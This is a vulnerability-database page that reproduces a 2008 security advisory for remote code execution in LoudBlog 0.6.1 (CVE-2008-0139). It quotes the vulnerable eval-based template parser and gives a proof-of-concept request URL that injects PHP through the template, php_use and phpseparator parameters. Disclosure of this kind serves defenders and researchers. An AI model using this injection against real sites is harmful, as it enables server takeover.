Lucene search
+L

LoudBlog 0.6.1 - 'parsedpage' Remote Code Execution

🗓️ 06 Jan 2008 00:00:00Reported by Eugene MinaevType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

LoudBlog 0.6.1 'parsedpage' Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2008-0139
8 Jan 200819:00
cve
cvelist
Cvelist
CVE-2008-0139
8 Jan 200819:00
cvelist
euvd
EUVD
EUVD-2008-0152
7 Oct 202500:30
euvd
canvas
canvas
Immunity Canvas: LOUDBLOG_EXEC
8 Jan 200819:46
canvas
nessus
Tenable Nessus
Loudblog loudblog/inc/parse_old.php template Parameter Arbitrary Remote Code Execution
7 Jan 200800:00
nessus
nvd
NVD
CVE-2008-0139
8 Jan 200819:46
nvd
prion
Prion
Sql injection
8 Jan 200819:46
prion
----[ Loudblog Remote Code Execution ... ITDefence.ru Antichat.ru ]

							Loudblog >= 0.6.1 Remote Code Execution
							Eugene Minaev [email protected]
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
			. \_\\________[________________________________________]_________//_//_/ . .

		Template parser function

		<?php

		$parsedpage = fullparse(firstparse(hrefmagic($template)));

		//do we have php code within our template? switch between echo and eval!
		if ($php_use) {
		$templatepieces = explode ($phpseparator, $parsedpage);
		for ($i = 0; $i <= count($templatepieces); $i += 2) {
		echo $templatepieces[$i];
		if (isset($templatepieces[$i+1])) eval ($templatepieces[$i+1]);
		}
		//no php code, no eval!
		} else {
		echo $parsedpage;
		}

		?>

		loudblog/inc/parse_old.php?template=@phpinfo();@&php_use=1&phpseparator=@&parsedpage=@phpinfo();@


----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.222
24